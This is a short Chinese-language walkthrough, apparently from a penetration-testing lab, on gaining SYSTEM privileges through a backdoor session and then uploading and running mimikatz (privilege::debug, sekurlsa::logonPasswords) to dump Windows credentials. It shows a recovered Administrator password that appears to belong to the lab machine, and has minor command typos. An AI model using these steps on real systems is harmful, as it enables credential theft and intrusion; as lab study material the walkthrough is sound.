必须下载最新版本

Releases · gentilkiwi/mimikatz · GitHubhttps://github.com/gentilkiwi/mimikatz/releases

有32和64之分，systeminfo查看自己版本

 首先我们用后门得到权限，在用getsystem提权，因为mimikatz要system权限，getuid查看是否提权成功

 我是64靶机，所以x64文件夹拖入kali，并改名mimi

 

 upoad mimi c:\\ 传入靶机c盘

 shell 进入靶机操作界面， chcp 65001解决乱码

 

进入C盘，dir查看

 mimikatz.exe 运行 

然后输入 privilege::debug ，显示20 ok即可完成提权！

 

 sekurlsa::logonPassword   抓取靶机hash值

此时你发现sha1这种hash值都不需要解密。账号：Administrator  密码：hongrisec@2022